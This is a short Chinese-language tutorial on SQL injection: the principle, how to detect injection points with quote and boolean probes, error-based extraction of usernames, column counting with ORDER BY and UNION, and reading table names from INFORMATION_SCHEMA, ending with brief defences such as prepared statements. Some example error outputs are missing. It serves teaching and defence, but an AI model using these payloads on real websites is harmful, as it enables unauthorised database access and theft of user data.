sql注入

一.原理

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。SQL注入是比较常见的网络攻击方式之一，是针对程序员编写时的疏忽，通过SQL语句，实现无账号登录，甚至篡改数据库。

二.过程

1.判断网站是否存在注入点

（1）加入单引号 ' 提交

结果：如果出现错误提示，则该网站可能存在注入漏洞

（2）数字型判断是否有注入

语句：and 1=1;and 1=2

结果：分别返回不同的页面，说明存在注入漏洞

（3）字符型判断是否有注入

语句：' and '1'=1; ' and '1=2

结果：分别返回不同的页面， 说明存在注入漏洞

分析：加入' and '1'=1返回正确页面，加入' and '1=2返回错误页面，说明有注入漏洞

2.利用错误消息提取信息

（1）利用数据类型错误提取数据

如果试图将一个字符串与非字符串比较，或者将一个字符串转换为另一个不兼容的类型，那么SQL 编辑器将会抛出异常。

例如：

SELECT * FROM user WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users)

　错误提示：

 

 这就可以获取到用户的用户名为 root。

利用此方法可以递归推导出所有的账户信息：

SELECT * FROM users WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users WHERE not in ('root'))

通过构造此语句就可以获得下一个 用户名；若把子查询中的 username 换成其他列名，则可以获取其他列的信息。

3.获取元数据

SQL Server 提供了大量视图，便于取得元数据。可以先猜测出表的列数，然后用 UNION 来构造 SQL 语句获取其中的数据。

SELECT *** FROM *** WHERE id = *** UNION SELECT 1, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES　　

一些常用的系统数据库视图：

4.order by猜测列数

SELECT * FROM users WHERE id = 1
SELECT * FROM users WHERE id = 1 ORDER BY 1
SELECT * FROM users WHERE id = 1 ORDER BY 2 
SELECT * FROM users WHERE id = 1 ORDER BY 4   --异常，超出范围

说明只有3列

5.union 查询

UNION 关键字将两个或多个查询结果组合为单个结果集，大部分数据库都支持 UNION 查询。但适用 UNION 合并两个结果有如下基本规则：

• 所有查询中的列数必须相同
• 数据类型必须兼容

用 UNION 查询猜测列数
不仅可以用 ORDER BY 方法来猜测列数，UNION 方法同样可以。

在之前假设的 user 表中有 5 列，若我们用 UNION 联合查询：

SELECT * FROM users WHERE id = 1 UNION SELECT 1

数据库会发出异常：

可以通过递归查询，直到无错误产生，就可以得知 User 表的查询字段数：

UNION SELECT 1,2
UNION SELECT 1,2,3

三.防止sql注入

      但凡有SQL注入漏洞的程序，都是因为程序要接受来自客户端用户输入的变量或URL传递的参数，并且这个变量或参数是组成SQL语句的一部分，对于用户输入的内容或传递的参数，我们应该要时刻保持警惕，这是安全领域里的「外部数据不可信任」的原则，纵观Web安全领域的各种攻击方式，大多数都是因为开发者违反了这个原则而导致的，所以自然能想到的，就是从变量的检测、过滤、验证下手，确保变量是开发者所预想的。

1.检查变量数据类型和格式

2.过滤特殊符号

3.绑定变量，使用预编译语句